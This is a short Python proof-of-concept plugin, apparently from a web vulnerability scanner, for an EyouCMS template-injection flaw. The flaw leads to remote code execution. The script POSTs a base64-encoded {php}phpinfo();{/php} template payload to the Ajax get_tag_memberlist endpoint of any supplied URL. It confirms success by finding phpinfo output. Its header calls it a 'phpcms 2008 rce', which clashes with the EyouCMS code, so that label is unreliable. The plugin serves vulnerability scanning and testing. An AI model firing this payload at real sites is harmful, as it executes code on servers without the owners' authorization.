# Author:w8ay
# Name:phpcms 2008 rce
'''
referer: http://www.lovei.org/archives/EyouCMS-SSTI.html
description: 攻击者可利用此漏洞构造恶意的url，向服务器写入任意内容的文件，达到远程代码执行的目的。
'''
import HackRequests

def poc(arg, **kwargs):
    headers = {
        "X-Requested-With":"XMLHttpRequest",
        "Content-Type":"application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    url_preffix = arg + "/index.php?m=api&c=Ajax&a=get_tag_memberlist"
    post_data = "htmlcode=fuhei&attarray=eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9"
    hh = HackRequests.http(url_preffix,post=post_data,headers=headers,timeout=10)
    if hh.status_code == 200 and 'phpinfo' in hh.text():
        result = {
            "name": "EyouCms1_4_2_rce",  # 插件名称
            "content": "攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。",  # 插件返回内容详情，会造成什么后果。
            "url": url_preffix,  # 漏洞存在url
            "log": hh.log,
            "tag": "rce"  # 漏洞标签
        }
        return result

if __name__ == "__main__":
    pass